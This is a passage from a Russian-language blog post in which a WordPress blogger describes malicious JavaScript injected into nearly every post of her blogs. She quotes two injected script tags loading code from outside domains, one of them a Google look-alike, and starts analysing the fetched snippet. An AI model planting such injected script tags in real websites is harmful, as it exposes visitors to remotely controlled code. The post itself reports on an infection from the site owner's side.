Летом во многих stand-alone блогах WordPress практически в каждой записи, в том числе и на страницах появился вредоносный код, написанный на JavaScript, представляющий собой вызываемую удаленную программу. Увы, пока я спокойно отдыхала от городской суеты, работы и интернета, мои блоги также не избежали этой участи. Почти в каждой записи обнаружила вот такой код: <script type="text/javascript" src="//shareup.ru/social.js"></script> Еще на пяти страницах другого блога я обнаружила следующий код: <script src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script> Посещение сайтов, фигурирующих в этих кодах, ничего не дало: в обоих случаях браузер выдал код 403. При попытке посмотреть JavaScript-код из первого адреса я увидела безобидную строку: if (!lf) { var lf=1; document.write(''); } Как видно из текста этой программки, в случае, если переменная не задана, ей присваивается значение единицы, ...